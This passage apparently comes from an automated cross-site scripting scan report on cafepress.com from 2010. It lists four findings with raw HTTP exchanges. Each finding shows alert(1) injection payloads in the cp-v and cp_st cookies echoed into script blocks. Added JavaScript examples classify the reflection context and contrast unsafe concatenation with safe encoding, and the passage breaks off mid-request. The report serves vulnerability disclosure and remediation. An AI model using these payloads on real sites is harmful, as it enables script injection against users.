__utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 59474 Date: Sun, 26 Dec 2010 13:49:15 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:15 GMT; path=/ Set-Cookie: cp_sc=201672; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:15 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59474 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '71ca1</script><script>alert(1)</script>6e6e4d328ee ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.60. http://www.cafepress.com/+steins [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+steins
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 747f7"-alert(1)-"1bd54518006 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+steins HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA747f7"-alert(1)-"1bd54518006 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW13 Cteonnt-Length: 58697 Date: Sun, 26 Dec 2010 13:47:30 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:29 GMT; path=/ Set-Cookie: cp_sc=100143; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:29 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58697 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA747f7"-alert(1)-"1bd54518006 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.61. http://www.cafepress.com/+steins [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+steins
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ddbad</script><script>alert(1)</script>e5bee7f619b was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+steins HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=ddbad</script><script>alert(1)</script>e5bee7f619b ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW19 Cteonnt-Length: 58719 Date: Sun, 26 Dec 2010 13:47:28 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:28 GMT; path=/ Set-Cookie: cp_sc=100143; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:28 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58719 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = 'ddbad</script><script>alert(1)</script>e5bee7f619b ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.62. http://www.cafepress.com/+stocking [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+stocking
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77a9a"-alert(1)-"6b71a0eba86 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+stocking HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA77a9a"-alert(1)-"6b71a0eba86 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW17
Cteonnt-Length: 59606
Date: Sun, 26 Dec 2010 13:49:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:02 GMT; path=/
Set-Cookie: cp_sc=201674; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:02 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";
s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA77a9a"-alert(1)-"6b71a0eba86 ";
s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate
} el...[SNIP]...
1.63. http://www.cafepress.com/+stocking [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+stocking
Issue detail
The value of the cp_st cookie is copied into a JavaScript string literal delimited by single quotation marks (the window.cafepress.tealeaf.searchTerm = '...' assignment in the response below). The payload cd3b0</script><script>alert(1)</script>6a078ca5ef1 was submitted in the cp_st cookie and was echoed unmodified in the application's response. This payload does not need to close the single-quoted string: the HTML parser ends the script element at the first </script> it sees, whatever state the JavaScript string is in, so the <script>alert(1)</script> that follows is parsed as a new script element and runs. This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. Because the injected data arrives in a cookie, the behaviour is not trivial to exploit against another user: the attacker first needs a way to set the cp_st cookie in the victim's browser. That limitation is real but not complete. The response sets its cookies with domain=cafepress.com, so any content injection on any host under cafepress.com, or an active network attacker on a plain-HTTP page (every request in this report is over http://), can plant cp_st for the whole domain. The server also writes cp_st itself (Set-Cookie: cp_st= in the response) and echoes it as a search term, so it is worth checking whether the application populates this cookie from request data such as a search query; if it does, the cookie requirement disappears and the issue becomes an ordinary reflected XSS.
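The context classification in the detail above, and the matching "double quotation marks" classification for the cp-v reflections in 1.62 and 1.64, can be reproduced mechanically. The following is an added example written for this page; it is not code from the XSS.CX crawler or from cafepress.com. Given a response body and the exact canary that was sent, it checks that the canary came back byte-for-byte, finds the script element enclosing it, and walks the JavaScript text up to the reflection point to decide whether the parser is inside a quoted string there and which delimiter opened it. The two sample bodies are constructed from the script fragments in this report; the variable name abTests, the surrounding tags and the var s = {} line are made up for the example.

```javascript
// Added example for this report page; not code from the XSS.CX crawler or from cafepress.com.
// Given a response body and the exact canary string that was sent in the cookie, decide
// whether it came back byte-for-byte, whether it landed inside a <script> element, and if
// so whether the JavaScript parser is inside a quoted string at that point (and which
// quote opened it). Regex and template literals are deliberately not modelled; that is
// enough for the simple assignments seen in this report.

// Walk JavaScript source and return the lexical state at its end.
function jsStateAt(js) {
  let state = 'code';
  let quote = null;
  for (let i = 0; i < js.length; i++) {
    const c = js[i];
    const n = js[i + 1];
    if (state === 'string') {
      if (c === '\\') i++;                         // skip the escaped character
      else if (c === quote) { state = 'code'; quote = null; }
    } else if (state === 'line-comment') {
      if (c === '\n') state = 'code';
    } else if (state === 'block-comment') {
      if (c === '*' && n === '/') { state = 'code'; i++; }
    } else if (c === '"' || c === "'") {
      state = 'string'; quote = c;
    } else if (c === '/' && n === '/') {
      state = 'line-comment'; i++;
    } else if (c === '/' && n === '*') {
      state = 'block-comment'; i++;
    }
  }
  return { state, quote };
}

function classifyReflection(body, canary) {
  const idx = body.indexOf(canary);
  if (idx === -1) return { reflected: false };   // absent, or encoded/modified on the way out

  // Find the <script> element whose content spans the reflection point, if any.
  const lower = body.toLowerCase();
  const openTag = /<script\b[^>]*>/gi;
  let m;
  let scriptStart = -1;
  while ((m = openTag.exec(body)) !== null) {
    const start = m.index + m[0].length;
    if (start > idx) break;
    const close = lower.indexOf('</script', start);
    if (close === -1 || close > idx) { scriptStart = start; break; }
  }
  if (scriptStart === -1) return { reflected: true, context: 'html' };

  const { state, quote } = jsStateAt(body.slice(scriptStart, idx));
  return {
    reflected: true,
    context: 'js-' + state,
    quote,
    // A quote breakout needs the enclosing delimiter to appear raw in the canary.
    breaksString: state === 'string' && canary.includes(quote),
    // The HTML tokenizer ends the element at "</script" whatever the JS state is,
    // so a canary carrying it escapes any quoted context.
    breaksScriptElement: /<\/script/i.test(canary),
  };
}

// Constructed sample bodies, trimmed to the script fragments shown in this report.
// "abTests" is a made-up name for the unnamed variable that precedes s.eVar30.
const CP_V_CANARY = '77a9a"-alert(1)-"6b71a0eba86';
const SAMPLE_CP_V =
  '<html><head><script type="text/javascript">\n' +
  'var s = {};\n' +
  'var abTests = "EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";\n' +
  's.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA' + CP_V_CANARY + ' ";\n' +
  's.eVar26 = ""; //CafePress PID\n' +
  '</script></head><body></body></html>';

const CP_ST_CANARY = 'cd3b0</script><script>alert(1)</script>6a078ca5ef1';
const SAMPLE_CP_ST =
  '<html><head><script type="text/javascript">\n' +
  'window.cafepress = {}; window.cafepress.tealeaf = {};\n' +
  "window.cafepress.tealeaf.pageLandingType = 'SearchResults'\n" +
  "window.cafepress.tealeaf.searchTerm = '" + CP_ST_CANARY + " '\n" +
  "window.cafepress.tealeaf.salesChannel = 'Marketplace'\n" +
  '</script></head><body></body></html>';
```

classifyReflection(SAMPLE_CP_V, CP_V_CANARY) reports a double-quoted JS string that the canary's own quote can close; classifyReflection(SAMPLE_CP_ST, CP_ST_CANARY) reports a single-quoted JS string that the canary cannot close, but flags breaksScriptElement because the canary carries </script. That pair of flags is the difference between the two payload styles the scanner chose for cp-v and cp_st.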
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Input validation is a useful second layer here: the legitimate cp-v value in these requests is a 32-character hexadecimal token, and cp_st is used as a search term, so a cookie value that does not match the expected format can be rejected before it reaches the page. Validation is not a substitute for correct output encoding, though, because a search term can legitimately contain quotes and angle brackets.
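When the value cannot be kept out of the script block, the encoding has to cover both breakouts documented in this report: a bare double quote (the cp-v payload in 1.62 and 1.64) and a </script> sequence inside a single-quoted string (the cp_st payload above). The following is an added example, not code from cafepress.com or from the XSS.CX report: vulnerableAssignment() reproduces the concatenation pattern visible in the responses, safeAssignment() emits the value as a JSON-derived JavaScript string literal with the HTML-significant characters turned into \uXXXX escapes, and evaluateAssignment() runs the generated statement with a spy in place of alert() so the difference can be observed without a browser. The two payloads, the cookie prefix, s.eVar30 and window.cafepress.tealeaf.searchTerm are taken from the report; the scratch objects around them are constructed for the example.

```javascript
// Added example; not code from the XSS.CX report or from cafepress.com.
// Embedding untrusted data inside a <script> block: the pattern seen in this report
// beside a hardened version, plus a small harness that executes the generated statement.

const COOKIE_PREFIX = 'A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA';
const CP_V_PAYLOAD = '77a9a"-alert(1)-"6b71a0eba86 ';                       // from the report
const CP_ST_PAYLOAD = 'cd3b0</script><script>alert(1)</script>6a078ca5ef1 '; // from the report

// Pattern seen in the report: the raw value dropped between a pair of quotes.
function vulnerableAssignment(target, value, quote) {
  return target + ' = ' + quote + value + quote + ';';
}

// JSON.stringify yields a double-quoted literal with " and \ already escaped.
// The replace then hides < > & and the two line terminators behind \uXXXX escapes,
// which the JavaScript parser decodes but the HTML tokenizer never sees, so neither
// a closing quote nor the "</script" token can appear in the emitted text.
function toJsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(/[<>&\u2028\u2029]/g, (c) =>
    '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

function safeAssignment(target, value) {
  return target + ' = ' + toJsStringLiteral(value) + ';';
}

// Execute a generated statement in a throwaway scope, with a spy standing in for
// alert(), and report whether the payload ran and what value the target received.
// The scratch objects s and window are constructed so both targets resolve.
function evaluateAssignment(code, target) {
  const calls = [];
  const fn = new Function(
    'alert',
    'var s = {}; var window = { cafepress: { tealeaf: {} } };\n' +
      code + '\nreturn ' + target + ';'
  );
  const result = fn((x) => { calls.push(x); return 0; });
  return { alertCalls: calls.length, value: result };
}

// Demonstration matching the report's two reflections.
function demo() {
  const cpv = COOKIE_PREFIX + CP_V_PAYLOAD;
  const term = 'window.cafepress.tealeaf.searchTerm';
  return {
    // "..."-alert(1)-"..." is a valid expression: alert runs and s.eVar30 becomes NaN.
    vulnerableCpV: evaluateAssignment(vulnerableAssignment('s.eVar30', cpv, '"'), 's.eVar30'),
    safeCpV: evaluateAssignment(safeAssignment('s.eVar30', cpv), 's.eVar30'),
    // The cp_st breakout is an HTML-parser effect: as JavaScript alone the single-quoted
    // literal is harmless, which is exactly why a JS-only check misses it.
    vulnerableCpSt: evaluateAssignment(vulnerableAssignment(term, CP_ST_PAYLOAD, "'"), term),
    // For that case the relevant check is that the safe literal no longer contains "</script".
    safeCpStLiteral: safeAssignment(term, CP_ST_PAYLOAD),
  };
}
```

JSON.stringify on its own is not sufficient: it leaves <, > and / untouched, so a value containing </script> would still terminate the element; the second replace in toJsStringLiteral() closes that gap. Because the output stays a valid JSON string, the same literal can be parsed back with JSON.parse for a round-trip check.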
Request
GET /+stocking HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=cd3b0</script><script>alert(1)</script>6a078ca5ef1 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; 